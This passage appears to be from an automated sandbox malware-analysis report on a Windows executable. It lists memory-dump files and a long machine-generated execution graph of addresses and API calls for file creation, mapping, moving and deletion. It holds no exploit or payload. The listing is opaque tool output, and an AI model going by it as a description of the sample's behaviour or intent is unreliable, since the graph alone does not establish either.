                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorH_prolog3_LastObjectSingleWait
                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                              • API String ID: 2419225763-2248577382
                                                                              • Opcode ID: 24afe2334a392179459fcd388545c75f0b857b5be74f53c54a3924b43cc542a1
                                                                              • Instruction ID: 6f2c52ce14efeb42bd4cafedf13680636e2a0866d88b4e9b365054294f403da7
                                                                              • Opcode Fuzzy Hash: 24afe2334a392179459fcd388545c75f0b857b5be74f53c54a3924b43cc542a1
                                                                              • Instruction Fuzzy Hash: 73D05E7150462126CA1027B87C1EE7B2A088F023B0B25034DB139A63EACE10498082F6

                                                                              Execution Graph

                                                                              Execution Coverage:9.2%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0.5%
                                                                              Total number of Nodes:1518
                                                                              Total number of Limit Nodes:31
                                                                              execution_graph 24014 d3c9d0 24015 d3c9da __EH_prolog 24014->24015 24183 d212f6 24015->24183 24018 d3d10b 24272 d3e7ee 24018->24272 24019 d3ca1a 24022 d3ca8b 24019->24022 24023 d3ca28 24019->24023 24094 d3ca31 24019->24094 24028 d3cb1e GetDlgItemTextW 24022->24028 24032 d3caa1 24022->24032 24024 d3ca68 24023->24024 24025 d3ca2c 24023->24025 24034 d3cb4f KiUserCallbackDispatcher 24024->24034 24024->24094 24033 d2f937 53 API calls 24025->24033 24025->24094 24026 d3d126 SendMessageW 24027 d3d134 24026->24027 24030 d3d14e GetDlgItem SendMessageW 24027->24030 24031 d3d13d SendDlgItemMessageW 24027->24031 24028->24024 24029 d3cb5b 24028->24029 24035 d3cb70 GetDlgItem 24029->24035 24181 d3cb64 24029->24181 24290 d3b65d GetCurrentDirectoryW 24030->24290 24031->24030 24037 d2f937 53 API calls 24032->24037 24038 d3ca4b 24033->24038 24034->24094 24039 d3cba7 SetFocus 24035->24039 24040 d3cb84 SendMessageW SendMessageW 24035->24040 24042 d3cabe SetDlgItemTextW 24037->24042 24312 d2122f SHGetMalloc 24038->24312 24043 d3cbb7 24039->24043 24058 d3cbc3 24039->24058 24040->24039 24041 d3d17e GetDlgItem 24046 d3d1a1 SetWindowTextW 24041->24046 24047 d3d19b 24041->24047 24044 d3cac9 24042->24044 24048 d2f937 53 API calls 24043->24048 24052 d3cad6 GetMessageW 24044->24052 24044->24094 24291 d3bbc0 GetClassNameW 24046->24291 24047->24046 24053 d3cbc1 24048->24053 24050 d3d051 24051 d2f937 53 API calls 24050->24051 24055 d3d061 SetDlgItemTextW 24051->24055 24056 d3caed IsDialogMessageW 24052->24056 24052->24094 24193 d3e619 24053->24193 24060 d3d075 24055->24060 24056->24044 24061 d3cafc TranslateMessage DispatchMessageW 24056->24061 24064 d2f937 53 API calls 24058->24064 24059 d3d3f8 SetDlgItemTextW 24059->24094 24066 d2f937 53 API calls 24060->24066 24061->24044 24068 d3cbfa 24064->24068 24065 d3cc1d 24069 d3cc51 24065->24069 24313 d2b4c1 24065->24313 24105 d3d098 _wcslen 24066->24105 24067 d3d1ec 24071 d3d21c 24067->24071 24075 d2f937 53 API calls 24067->24075 24072 d24a20 _swprintf 51 API calls 24068->24072 24203 d2b341 24069->24203 24070 d3d884 97 API calls 24070->24067 24076 d3d884 97 API calls 24071->24076 24125 d3d2d4 24071->24125 24072->24053 24080 d3d1ff SetDlgItemTextW 24075->24080 24081 d3d237 24076->24081 24078 d3d387 24083 d3d390 EnableWindow 24078->24083 24084 d3d399 24078->24084 24088 d2f937 53 API calls 24080->24088 24095 d3d249 24081->24095 24124 d3d26e 24081->24124 24082 d3cc4b 24316 d3beff CreateDirectoryW LocalFree GetCurrentProcess GetLastError 24082->24316 24083->24084 24091 d3d3b6 24084->24091 24325 d212b3 GetDlgItem EnableWindow 24084->24325 24085 d3d0e9 24089 d2f937 53 API calls 24085->24089 24086 d3cc6a GetLastError 24087 d3cc75 24086->24087 24209 d3bc19 SetCurrentDirectoryW 24087->24209 24093 d3d213 SetDlgItemTextW 24088->24093 24089->24094 24098 d3d3dd 24091->24098 24106 d3d3d5 SendMessageW 24091->24106 24093->24071 24323 d3aef5 32 API calls 24095->24323 24096 d3d2c7 24102 d3d884 97 API calls 24096->24102 24098->24094 24109 d2f937 53 API calls 24098->24109 24099 d3cc89 24100 d3cca0 24099->24100 24101 d3cc92 GetLastError 24099->24101 24107 d3cd17 24100->24107 24113 d3cd26 24100->24113 24115 d3ccb0 GetTickCount 24100->24115 24101->24100 24102->24125 24104 d3d3ac 24326 d212b3 GetDlgItem EnableWindow 24104->24326 24105->24085 24111 d2f937 53 API calls 24105->24111 24106->24098 24112 d3cf52 24107->24112 24107->24113 24108 d3d262 24108->24124 24116 d3ca52 24109->24116 24117 d3d0cc 24111->24117 24228 d212d1 GetDlgItem ShowWindow 24112->24228 24118 d3cef7 24113->24118 24119 d3cd3f GetModuleFileNameW 24113->24119 24120 d3ceed 24113->24120 24114 d3d365 24324 d3aef5 32 API calls 24114->24324 24210 d24a20 24115->24210 24116->24059 24116->24094 24126 d24a20 _swprintf 51 API calls 24117->24126 24130 d2f937 53 API calls 24118->24130 24317 d305ed 82 API calls 24119->24317 24120->24024 24120->24118 24124->24096 24131 d3d884 97 API calls 24124->24131 24125->24078 24125->24114 24127 d2f937 53 API calls 24125->24127 24126->24085 24127->24125 24129 d3d384 24129->24078 24137 d3cf01 24130->24137 24134 d3d29c 24131->24134 24132 d3cf62 24229 d212d1 GetDlgItem ShowWindow 24132->24229 24133 d3cccd 24213 d2a8ce 24133->24213 24134->24096 24140 d3d2a5 DialogBoxParamW 24134->24140 24135 d3cd67 24138 d24a20 _swprintf 51 API calls 24135->24138 24139 d24a20 _swprintf 51 API calls 24137->24139 24142 d3cd89 CreateFileMappingW 24138->24142 24145 d3cf1f 24139->24145 24140->24024 24140->24096 24141 d3cf6c 24230 d2f937 24141->24230 24146 d3cde7 GetCommandLineW 24142->24146 24169 d3ce5e __InternalCxxFrameHandler 24142->24169 24154 d2f937 53 API calls 24145->24154 24149 d3cdf8 24146->24149 24148 d3ccf3 24151 d3ccfa GetLastError 24148->24151 24152 d3cd05 24148->24152 24318 d3c615 SHGetMalloc 24149->24318 24151->24152 24221 d2a801 24152->24221 24157 d3cf39 24154->24157 24155 d3cf88 SetDlgItemTextW GetDlgItem 24158 d3cfa5 GetWindowLongW SetWindowLongW 24155->24158 24159 d3cfbd 24155->24159 24158->24159 24235 d3d884 24159->24235 24160 d3ce14 24319 d3c615 SHGetMalloc 24160->24319 24163 d3ce20 24320 d3c615 SHGetMalloc 24163->24320 24165 d3d884 97 API calls 24167 d3cfd9 24165->24167 24260 d3eba2 24167->24260 24168 d3ce2c 24321 d3069c 82 API calls 24168->24321 24176 d3ceb3 Sleep 24169->24176 24177 d3cec7 24169->24177 24173 d3ce3d MapViewOfFile 24173->24169 24175 d3cedd UnmapViewOfFile CloseHandle 24175->24120 24176->24169 24176->24177 24177->24120 24177->24175 24181->24024 24181->24050 24184 d21358 24183->24184 24185 d212ff 24183->24185 24328 d2f5e1 GetWindowLongW SetWindowLongW 24184->24328 24187 d21365 24185->24187 24327 d2f608 62 API calls 2 library calls 24185->24327 24187->24018 24187->24019 24187->24094 24189 d21321 24189->24187 24190 d21334 GetDlgItem 24189->24190 24190->24187 24191 d21344 24190->24191 24191->24187 24192 d2134a SetWindowTextW 24191->24192 24192->24187 24329 d3c758 PeekMessageW 24193->24329 24196 d3e647 24200 d3e652 ShowWindow SendMessageW SendMessageW 24196->24200 24197 d3e67b SendMessageW SendMessageW 24198 d3e6b7 24197->24198 24199 d3e6d6 SendMessageW SendMessageW SendMessageW 24197->24199 24198->24199 24201 d3e709 SendMessageW 24199->24201 24202 d3e72c SendMessageW 24199->24202 24200->24197 24201->24202 24202->24065 24204 d2b34b 24203->24204 24205 d2b405 24204->24205 24206 d2b3dc 24204->24206 24334 d2b542 24204->24334 24205->24086 24205->24087 24206->24205 24207 d2b542 8 API calls 24206->24207 24207->24205 24209->24099 24361 d249f3 24210->24361 24214 d2a8d8 24213->24214 24215 d2a935 CreateFileW 24214->24215 24216 d2a929 24214->24216 24215->24216 24217 d2a97f 24216->24217 24218 d2cf32 GetCurrentDirectoryW 24216->24218 24217->24148 24219 d2a964 24218->24219 24219->24217 24220 d2a968 CreateFileW 24219->24220 24220->24217 24222 d2a825 24221->24222 24227 d2a836 24221->24227 24223 d2a831 24222->24223 24224 d2a838 24222->24224 24222->24227 24448 d2a9ae 24223->24448 24453 d2a880 24224->24453 24227->24107 24228->24132 24229->24141 24231 d2f947 24230->24231 24468 d2f968 24231->24468 24234 d212d1 GetDlgItem ShowWindow 24234->24155 24236 d3d88e __EH_prolog 24235->24236 24242 d3cfcb 24236->24242 24491 d3c504 24236->24491 24239 d3c504 ExpandEnvironmentStringsW 24249 d3d8c5 _wcslen _wcsrchr 24239->24249 24240 d3dbac SetWindowTextW 24240->24249 24242->24165 24246 d3d99a SetFileAttributesW 24247 d3da54 GetFileAttributesW 24246->24247 24259 d3d9b4 __cftof _wcslen 24246->24259 24247->24249 24251 d3da66 DeleteFileW 24247->24251 24249->24239 24249->24240 24249->24242 24249->24246 24252 d3dd76 GetDlgItem SetWindowTextW SendMessageW 24249->24252 24256 d3ddb6 SendMessageW 24249->24256 24495 d33316 CompareStringW 24249->24495 24496 d3b65d GetCurrentDirectoryW 24249->24496 24498 d2b9ca 6 API calls 24249->24498 24499 d2b953 FindClose 24249->24499 24500 d3c67e 76 API calls 2 library calls 24249->24500 24501 d4521e 24249->24501 24251->24249 24253 d3da77 24251->24253 24252->24249 24254 d24a20 _swprintf 51 API calls 24253->24254 24255 d3da97 GetFileAttributesW 24254->24255 24255->24253 24257 d3daac MoveFileW 24255->24257 24256->24249 24257->24249 24258 d3dac4 MoveFileExW 24257->24258 24258->24249 24259->24247 24259->24249 24497 d2cdc0 51 API calls 2 library calls 24259->24497 24261 d3ebac __EH_prolog 24260->24261 24525 d31983 24261->24525 24263 d3ebdd 24529 d264ed 24263->24529 24265 d3ebfb 24533 d28823 24265->24533 24269 d3ec4e 24551 d2890a 24269->24551 24273 d3e7f8 24272->24273 25109 d3b5d6 24273->25109 24276 d3e805 GetWindow 24277 d3d111 24276->24277 24280 d3e825 24276->24280 24277->24026 24277->24027 24278 d3e832 GetClassNameW 25114 d33316 CompareStringW 24278->25114 24280->24277 24280->24278 24281 d3e856 GetWindowLongW 24280->24281 24282 d3e8ba GetWindow 24280->24282 24281->24282 24283 d3e866 SendMessageW 24281->24283 24282->24277 24282->24280 24283->24282 24284 d3e87c GetObjectW 24283->24284 25115 d3b615 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24284->25115 24286 d3e893 25116 d3b5f4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24286->25116 25117 d3b81c 8 API calls 24286->25117 24289 d3e8a4 SendMessageW DeleteObject 24289->24282 24290->24041 24292 d3bbe1 24291->24292 24293 d3bc06 24291->24293 25120 d33316 CompareStringW 24292->25120 24294 d3bc14 24293->24294 24295 d3bc0b SHAutoComplete 24293->24295 24299 d3c217 24294->24299 24295->24294 24297 d3bbf4 24297->24293 24298 d3bbf8 FindWindowExW 24297->24298 24298->24293 24300 d3c221 __EH_prolog 24299->24300 24301 d213f8 43 API calls 24300->24301 24302 d3c243 24301->24302 25121 d22083 24302->25121 24305 d3c25d 24307 d21641 86 API calls 24305->24307 24306 d3c26c 24308 d21a7e 142 API calls 24306->24308 24309 d3c268 24307->24309 24311 d3c28b __InternalCxxFrameHandler ___std_exception_copy 24308->24311 24309->24067 24309->24070 24310 d21641 86 API calls 24310->24309 24311->24310 24312->24116 25129 d2b4d3 24313->25129 24316->24069 24317->24135 24318->24160 24319->24163 24320->24168 24321->24173 24323->24108 24324->24129 24325->24104 24326->24091 24327->24189 24328->24187 24330 d3c773 GetMessageW 24329->24330 24331 d3c7ac GetDlgItem 24329->24331 24332 d3c789 IsDialogMessageW 24330->24332 24333 d3c798 TranslateMessage DispatchMessageW 24330->24333 24331->24196 24331->24197 24332->24331 24332->24333 24333->24331 24335 d2b54f 24334->24335 24336 d2b573 24335->24336 24337 d2b566 CreateDirectoryW 24335->24337 24338 d2b4c1 3 API calls 24336->24338 24337->24336 24339 d2b5a6 24337->24339 24340 d2b579 24338->24340 24342 d2b5b5 24339->24342 24347 d2b8e6 24339->24347 24341 d2b5b9 GetLastError 24340->24341 24355 d2cf32 24340->24355 24341->24342 24342->24204 24345 d2b58f 24345->24341 24346 d2b593 CreateDirectoryW 24345->24346 24346->24339 24346->24341 24359 d3ffd0 24347->24359 24350 d2b936 24350->24342 24351 d2b909 24352 d2cf32 GetCurrentDirectoryW 24351->24352 24353 d2b91d 24352->24353 24353->24350 24354 d2b921 SetFileAttributesW 24353->24354 24354->24350 24356 d2cf3f _wcslen 24355->24356 24357 d2cfe7 GetCurrentDirectoryW 24356->24357 24358 d2cf68 _wcslen 24356->24358 24357->24358 24358->24345 24360 d2b8f3 SetFileAttributesW 24359->24360 24360->24350 24360->24351 24362 d24a0a __vswprintf_c_l 24361->24362 24365 d472e2 24362->24365 24368 d453a5 24365->24368 24369 d453e5 24368->24369 24370 d453cd 24368->24370 24369->24370 24372 d453ed 24369->24372 24392 d4a7eb 20 API calls _abort 24370->24392 24394 d45944 24372->24394 24373 d453d2 24393 d451b9 26 API calls _abort 24373->24393 24377 d453dd 24385 d40d7c 24377->24385 24380 d24a14 24380->24133 24381 d45475 24403 d45cf4 51 API calls 3 library calls 24381->24403 24384 d45480 24404 d459c7 20 API calls _free 24384->24404 24386 d40d84 24385->24386 24387 d40d85 IsProcessorFeaturePresent 24385->24387 24386->24380 24389 d40dc7 24387->24389 24405 d40d8a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24389->24405 24391 d40eaa 24391->24380 24392->24373 24393->24377 24395 d45961 24394->24395 24396 d453fd 24394->24396 24395->24396 24406 d4a515 GetLastError 24395->24406 24402 d4590f 20 API calls 2 library calls 24396->24402 24398 d45982 24426 d4aaf6 38 API calls __cftof 24398->24426 24400 d4599b 24427 d4ab23 38 API calls __cftof 24400->24427 24402->24381 24403->24384 24404->24377 24405->24391 24407 d4a531 24406->24407 24408 d4a52b 24406->24408 24412 d4a580 SetLastError 24407->24412 24429 d4c2f6 24407->24429 24428 d4c01b 11 API calls 2 library calls 24408->24428 24412->24398 24413 d4a54b 24436 d4a66a 24413->24436 24416 d4a560 24416->24413 24418 d4a567 24416->24418 24417 d4a551 24419 d4a58c SetLastError 24417->24419 24443 d4a380 20 API calls _abort 24418->24443 24444 d4a0f4 38 API calls _abort 24419->24444 24421 d4a572 24423 d4a66a _free 20 API calls 24421->24423 24425 d4a579 24423->24425 24425->24412 24425->24419 24426->24400 24427->24396 24428->24407 24435 d4c303 _abort 24429->24435 24430 d4c343 24446 d4a7eb 20 API calls _abort 24430->24446 24431 d4c32e RtlAllocateHeap 24432 d4a543 24431->24432 24431->24435 24432->24413 24442 d4c071 11 API calls 2 library calls 24432->24442 24435->24430 24435->24431 24445 d48e5c 7 API calls 2 library calls 24435->24445 24437 d4a675 RtlFreeHeap 24436->24437 24441 d4a69e _free 24436->24441 24438 d4a68a 24437->24438 24437->24441 24447 d4a7eb 20 API calls _abort 24438->24447 24440 d4a690 GetLastError 24440->24441 24441->24417 24442->24416 24443->24421 24445->24435 24446->24432 24447->24440 24449 d2a9e1 24448->24449 24450 d2a9b7 24448->24450 24449->24227 24450->24449 24459 d2b470 24450->24459 24454 d2a8aa 24453->24454 24455 d2a88c 24453->24455 24456 d2a8c9 24454->24456 24467 d27685 76 API calls 24454->24467 24455->24454 24457 d2a898 CloseHandle 24455->24457 24456->24227 24457->24454 24460 d3ffd0 24459->24460 24461 d2b47d DeleteFileW 24460->24461 24462 d2b490 24461->24462 24463 d2a9df 24461->24463 24464 d2cf32 GetCurrentDirectoryW 24462->24464 24463->24227 24465 d2b4a4 24464->24465 24465->24463 24466 d2b4a8 DeleteFileW 24465->24466 24466->24463 24467->24456 24474 d2ecd0 24468->24474 24471 d2f965 SetDlgItemTextW 24471->24234 24472 d2f98b LoadStringW 24472->24471 24473 d2f9a2 LoadStringW 24472->24473 24473->24471 24479 d2ec0c 24474->24479 24476 d2eced 24478 d2ed02 24476->24478 24487 d2ed10 26 API calls 24476->24487 24478->24471 24478->24472 24480 d2ec24 24479->24480 24486 d2eca4 _strncpy 24479->24486 24482 d2ec48 24480->24482 24488 d330f5 WideCharToMultiByte 24480->24488 24485 d2ec79 24482->24485 24489 d2f8d1 50 API calls __vsnprintf 24482->24489 24490 d47571 26 API calls 3 library calls 24485->24490 24486->24476 24487->24478 24488->24482 24489->24485 24490->24486 24492 d3c50e 24491->24492 24493 d3c5e0 ExpandEnvironmentStringsW 24492->24493 24494 d3c5fd 24492->24494 24493->24494 24494->24249 24495->24249 24496->24249 24497->24259 24498->24249 24499->24249 24500->24249 24502 d4a6a4 24501->24502 24503 d4a6b1 24502->24503 24504 d4a6bc 24502->24504 24514 d4a7fe 24503->24514 24506 d4a6c4 24504->24506 24512 d4a6cd _abort 24504->24512 24507 d4a66a _free 20 API calls 24506->24507 24510 d4a6b9 24507->24510 24508 d4a6f7 HeapReAlloc 24508->24510 24508->24512 24509 d4a6d2 24521 d4a7eb 20 API calls _abort 24509->24521 24510->24249 24512->24508 24512->24509 24522 d48e5c 7 API calls 2 library calls 24512->24522 24515 d4a83c 24514->24515 24519 d4a80c _abort 24514->24519 24524 d4a7eb 20 API calls _abort 24515->24524 24516 d4a827 RtlAllocateHeap 24518 d4a83a 24516->24518 24516->24519 24518->24510 24519->24515 24519->24516 24523 d48e5c 7 API calls 2 library calls 24519->24523 24521->24510 24522->24512 24523->24519 24524->24518 24526 d31990 _wcslen 24525->24526 24560 d21895 24526->24560 24528 d319a8 24528->24263 24530 d31983 _wcslen 24529->24530 24531 d21895 78 API calls 24530->24531 24532 d319a8 24531->24532 24532->24265 24534 d2882d __EH_prolog 24533->24534 24573 d2e298 24534->24573 24536 d28855 24579 d3febe 24536->24579 24538 d28899 __cftof 24539 d3febe 27 API calls 24538->24539 24540 d288c0 24539->24540 24592 d35c64 24540->24592 24543 d28a38 24544 d28a42 24543->24544 24545 d28ab5 24544->24545 24625 d2b966 24544->24625 24549 d28b1a 24545->24549 24603 d290a2 24545->24603 24547 d28b5c 24547->24269 24549->24547 24631 d21397 74 API calls 24549->24631 25107 d2a41a DeleteFileW DeleteFileW GetCurrentDirectoryW __cftof 24551->25107 24553 d2892b 24554 d33546 86 API calls 24553->24554 24555 d2893c Concurrency::cancel_current_task 24553->24555 24554->24555 24556 d22111 26 API calls 24555->24556 24557 d28963 24556->24557 25108 d2e339 86 API calls Concurrency::cancel_current_task 24557->25108 24561 d218a7 24560->24561 24567 d218ff 24560->24567 24562 d218d0 24561->24562 24570 d276e9 76 API calls __vswprintf_c_l 24561->24570 24563 d4521e 22 API calls 24562->24563 24565 d218f0 24563->24565 24565->24567 24572 d2775a 75 API calls 24565->24572 24566 d218c6 24571 d2775a 75 API calls 24566->24571 24567->24528 24570->24566 24571->24562 24572->24567 24574 d2e2a2 __EH_prolog 24573->24574 24575 d3febe 27 API calls 24574->24575 24576 d2e2e5 24575->24576 24577 d3febe 27 API calls 24576->24577 24578 d2e309 24577->24578 24578->24536 24580 d3fec3 ___std_exception_copy 24579->24580 24581 d3fedd 24580->24581 24583 d3fedf 24580->24583 24600 d48e5c 7 API calls 2 library calls 24580->24600 24581->24538 24584 d248f5 Concurrency::cancel_current_task 24583->24584 24585 d3fee9 24583->24585 24598 d43340 RaiseException 24584->24598 24601 d43340 RaiseException 24585->24601 24587 d24911 24590 d24927 24587->24590 24599 d2136b 26 API calls Concurrency::cancel_current_task 24587->24599 24589 d40820 24590->24538 24593 d35c6e __EH_prolog 24592->24593 24594 d3febe 27 API calls 24593->24594 24595 d35c8a 24594->24595 24596 d288f2 24595->24596 24602 d32166 80 API calls 24595->24602 24596->24543 24598->24587 24599->24590 24600->24580 24601->24589 24602->24596 24604 d290ac __EH_prolog 24603->24604 24632 d213f8 24604->24632 24606 d290c8 24607 d290d9 24606->24607 24794 d2b1d2 24606->24794 24610 d29110 24607->24610 24642 d21ad3 24607->24642 24786 d21641 24610->24786 24611 d2910c 24611->24610 24661 d22032 24611->24661 24615 d291b2 24665 d2924e 24615->24665 24618 d29211 24618->24610 24673 d24264 24618->24673 24685 d292c6 24618->24685 24623 d2b966 7 API calls 24624 d29139 24623->24624 24624->24615 24624->24623 24798 d2d4d2 CompareStringW _wcslen 24624->24798 24627 d2b97b 24625->24627 24626 d2b9a9 24626->24544 24627->24626 25096 d2ba94 24627->25096 24629 d2b98b 24629->24626 24630 d2b990 FindClose 24629->24630 24630->24626 24631->24547 24633 d213fd __EH_prolog 24632->24633 24634 d2e298 27 API calls 24633->24634 24635 d21437 24634->24635 24636 d3febe 27 API calls 24635->24636 24639 d214ab 24635->24639 24637 d21498 24636->24637 24637->24639 24799 d2644d 24637->24799 24807 d2c1f7 24639->24807 24640 d21533 __cftof 24640->24606 24643 d21add __EH_prolog 24642->24643 24655 d21b30 24643->24655 24658 d21c63 24643->24658 24832 d213d9 24643->24832 24645 d21c9e 24844 d21397 74 API calls 24645->24844 24648 d24264 115 API calls 24652 d21ce9 24648->24652 24649 d21cab 24649->24648 24649->24658 24650 d21d31 24654 d21d64 24650->24654 24650->24658 24845 d21397 74 API calls 24650->24845 24652->24650 24653 d24264 115 API calls 24652->24653 24653->24652 24654->24658 24659 d2b110 79 API calls 24654->24659 24655->24645 24655->24649 24655->24658 24656 d24264 115 API calls 24657 d21db5 24656->24657 24657->24656 24657->24658 24658->24611 24659->24657 24662 d22037 __EH_prolog 24661->24662 24664 d22068 24662->24664 24861 d21a7e 24662->24861 24664->24624 25011 d2e395 24665->25011 24667 d2925e 25015 d32701 GetSystemTime SystemTimeToFileTime 24667->25015 24669 d291cc 24669->24618 24670 d32eb4 24669->24670 25020 d3efab 24670->25020 24674 d24270 24673->24674 24675 d24274 24673->24675 24674->24618 24684 d2b110 79 API calls 24675->24684 24676 d24286 24677 d242a1 24676->24677 24678 d242af 24676->24678 24679 d242e1 24677->24679 25028 d2395a 103 API calls 3 library calls 24677->25028 25029 d22eb6 115 API calls 3 library calls 24678->25029 24679->24618 24682 d242ad 24682->24679 25030 d22544 74 API calls 24682->25030 24684->24676 24686 d292d0 __EH_prolog 24685->24686 24689 d2930e 24686->24689 24704 d2973d Concurrency::cancel_current_task 24686->24704 25048 d39cad 117 API calls 24686->25048 24688 d2a18d 24690 d2a192 24688->24690 24691 d2a1c5 24688->24691 24689->24688 24694 d2932f 24689->24694 24689->24704 24690->24704 25078 d28675 166 API calls 24690->25078 24691->24704 25079 d39cad 117 API calls 24691->25079 24694->24704 25031 d266df 24694->25031 24696 d29545 24703 d29669 24696->24703 24696->24704 25051 d28f6b 38 API calls 24696->25051 24698 d29405 24698->24696 25049 d2b5d6 57 API calls 3 library calls 24698->25049 24702 d295ac 25050 d48a18 26 API calls 2 library calls 24702->25050 24706 d2b966 7 API calls 24703->24706 24708 d296db 24703->24708 24704->24618 24706->24708 24707 d29935 25058 d2e4a9 96 API calls 24707->25058 25037 d289c8 24708->25037 24711 d2976c 24719 d297c5 24711->24719 25052 d24727 27 API calls 2 library calls 24711->25052 24714 d29990 24715 d29a3a 24714->24715 24723 d299bb 24714->24723 24721 d29a45 24715->24721 24722 d29a8c 24715->24722 24716 d298f4 Concurrency::cancel_current_task 24716->24714 25059 d2851f 50 API calls 2 library calls 24716->25059 24719->24704 24719->24716 24733 d298ed 24719->24733 25053 d287fb 41 API calls 24719->25053 25054 d2e4a9 96 API calls 24719->25054 25055 d2237a 74 API calls 24719->25055 25056 d28f28 98 API calls 24719->25056 24720 d29a2c 24729 d29ae8 24720->24729 24741 d29a8a 24720->24741 24721->24741 25061 d28b7c 123 API calls 24721->25061 24722->24720 25062 d28db3 119 API calls 24722->25062 24723->24720 24724 d2b4c1 3 API calls 24723->24724 24723->24729 24734 d299f3 24724->24734 24725 d2a801 80 API calls 24725->24704 24726 d29b53 24730 d2bf0a 27 API calls 24726->24730 24728 d2a801 80 API calls 24728->24704 24729->24726 24774 d2a14a 24729->24774 25063 d2ab1c 24729->25063 24732 d29ba2 24730->24732 24737 d2bf0a 27 API calls 24732->24737 25057 d2237a 74 API calls 24733->25057 24734->24720 25060 d2a50a 97 API calls 24734->25060 24754 d29bb8 24737->24754 24741->24728 24743 d29b41 25067 d27951 77 API calls 24743->25067 24745 d29c8b 24746 d29ce7 24745->24746 24747 d29e85 24745->24747 24750 d29cff 24746->24750 24757 d29da7 24746->24757 24748 d29e97 24747->24748 24749 d29eab 24747->24749 24771 d29d20 24747->24771 24751 d2a475 137 API calls 24748->24751 24753 d34586 75 API calls 24749->24753 24752 d29d46 24750->24752 24759 d29d0e 24750->24759 24751->24771 24752->24771 25070 d2829b 111 API calls 24752->25070 24756 d29ec4 24753->24756 24754->24745 24755 d29c62 24754->24755 24763 d2aa7a 79 API calls 24754->24763 24755->24745 25068 d2ac9c 82 API calls 24755->25068 24761 d3422f 137 API calls 24756->24761 25071 d28f6b 38 API calls 24757->25071 25069 d2237a 74 API calls 24759->25069 24761->24771 24763->24755 24765 d29e76 24765->24618 24766 d29dec 24767 d29e08 24766->24767 24768 d29e1f 24766->24768 24766->24771 25072 d28037 85 API calls 24767->25072 25073 d2a212 103 API calls __EH_prolog 24768->25073 24771->24765 24775 d29fca 24771->24775 25074 d2237a 74 API calls 24771->25074 24773 d2a0d5 24773->24774 24776 d2b8e6 3 API calls 24773->24776 24774->24725 24775->24773 24775->24774 24777 d2a083 24775->24777 25075 d2b199 SetEndOfFile 24775->25075 24779 d2a130 24776->24779 25043 d2b032 24777->25043 24779->24774 25076 d2237a 74 API calls 24779->25076 24781 d2a0ca 24782 d2a880 77 API calls 24781->24782 24782->24773 24784 d2a140 25077 d27871 76 API calls 24784->25077 24787 d21653 24786->24787 24789 d21665 Concurrency::cancel_current_task 24786->24789 24787->24789 25093 d216b2 26 API calls 24787->25093 24790 d22111 26 API calls 24789->24790 24791 d21694 24790->24791 25094 d2e339 86 API calls Concurrency::cancel_current_task 24791->25094 24795 d2b1e9 24794->24795 24796 d2b1f3 24795->24796 25095 d277af 78 API calls 24795->25095 24796->24607 24798->24624 24800 d26457 __EH_prolog 24799->24800 24813 d2c9d8 GetCurrentProcess GetProcessAffinityMask 24800->24813 24802 d26464 24814 d304e5 24802->24814 24804 d264bb 24818 d2665c GetCurrentProcess GetProcessAffinityMask 24804->24818 24806 d264d8 24806->24639 24808 d2c20d __cftof 24807->24808 24820 d2c0d3 24808->24820 24813->24802 24815 d304ef __EH_prolog 24814->24815 24819 d24846 41 API calls 24815->24819 24817 d3050b 24817->24804 24818->24806 24819->24817 24827 d2c0b4 24820->24827 24822 d2c148 24823 d22111 24822->24823 24824 d2212b 24823->24824 24825 d2211c 24823->24825 24824->24640 24831 d2136b 26 API calls Concurrency::cancel_current_task 24825->24831 24828 d2c0c2 24827->24828 24829 d2c0bd 24827->24829 24828->24822 24830 d22111 26 API calls 24829->24830 24830->24828 24831->24824 24846 d21822 24832->24846 24835 d2b110 24836 d2b122 24835->24836 24837 d2b135 24835->24837 24841 d2b140 24836->24841 24859 d27800 77 API calls 24836->24859 24839 d2b148 SetFilePointer 24837->24839 24837->24841 24840 d2b164 GetLastError 24839->24840 24839->24841 24840->24841 24842 d2b16e 24840->24842 24841->24655 24842->24841 24860 d27800 77 API calls 24842->24860 24844->24658 24845->24654 24847 d21834 24846->24847 24854 d213f2 24846->24854 24848 d2185d 24847->24848 24856 d276e9 76 API calls __vswprintf_c_l 24847->24856 24849 d4521e 22 API calls 24848->24849 24852 d2187a 24849->24852 24851 d21853 24857 d2775a 75 API calls 24851->24857 24852->24854 24858 d2775a 75 API calls 24852->24858 24854->24835 24856->24851 24857->24848 24858->24854 24859->24837 24860->24841 24862 d21a8a 24861->24862 24863 d21a8e 24861->24863 24862->24664 24865 d219c5 24863->24865 24866 d219d7 24865->24866 24867 d21a14 24865->24867 24868 d24264 115 API calls 24866->24868 24873 d246ce 24867->24873 24871 d219f7 24868->24871 24871->24862 24877 d246d7 24873->24877 24874 d24264 115 API calls 24874->24877 24875 d21a35 24875->24871 24878 d21f30 24875->24878 24877->24874 24877->24875 24890 d32128 24877->24890 24879 d21f3a __EH_prolog 24878->24879 24898 d242f1 24879->24898 24881 d21f61 24882 d21822 78 API calls 24881->24882 24883 d21fe8 24881->24883 24884 d21f78 24882->24884 24883->24871 24926 d2190b 78 API calls 24884->24926 24886 d21f90 24888 d21f9c _wcslen 24886->24888 24927 d32ed2 MultiByteToWideChar 24886->24927 24928 d2190b 78 API calls 24888->24928 24891 d3212f 24890->24891 24892 d3214a 24891->24892 24896 d276e4 RaiseException _com_raise_error 24891->24896 24893 d3215b SetThreadExecutionState 24892->24893 24897 d276e4 RaiseException _com_raise_error 24892->24897 24893->24877 24896->24892 24897->24893 24899 d242fb __EH_prolog 24898->24899 24900 d24311 24899->24900 24901 d2432d 24899->24901 24954 d21397 74 API calls 24900->24954 24903 d24588 24901->24903 24905 d24359 24901->24905 